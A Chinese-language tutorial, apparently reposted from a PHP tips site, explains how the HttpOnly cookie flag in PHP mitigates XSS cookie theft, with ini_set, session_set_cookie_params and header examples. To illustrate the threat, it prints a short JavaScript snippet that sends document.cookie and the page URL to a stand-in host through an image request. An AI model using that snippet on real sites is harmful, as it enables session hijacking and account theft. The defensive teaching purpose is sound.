xss防御之php利用httponly防xss攻击

前端之家收集整理的这篇文章主要介绍了xss防御之php利用httponly防xss攻击前端之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。

xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。

如下js获取cookie信息:

代码如下:@H_403_6@
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.PHP?c='+cookie+'&u='+url;
@H_403_6@

一般cookie都是从document对象中获取的,现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数,跟domain等其他参数一样,一旦这个HttpOnly被设置,你在浏览器的document对象中就看不到Cookie了。

PHP设置HttpOnly

代码如下:@H_403_6@
//在PHP.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly",1);//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0,NULL,TRUE);
@H_403_6@

对于PHP5.1以前版本的PHP通过:

代码如下:@H_403_6@
header("Set-Cookie: hidden=value; httpOnly");
@H_403_6@

最后,HttpOnly不是万能的!

原文链接:https://www.f2er.com/php/24900.html

猜你在找的PHP相关文章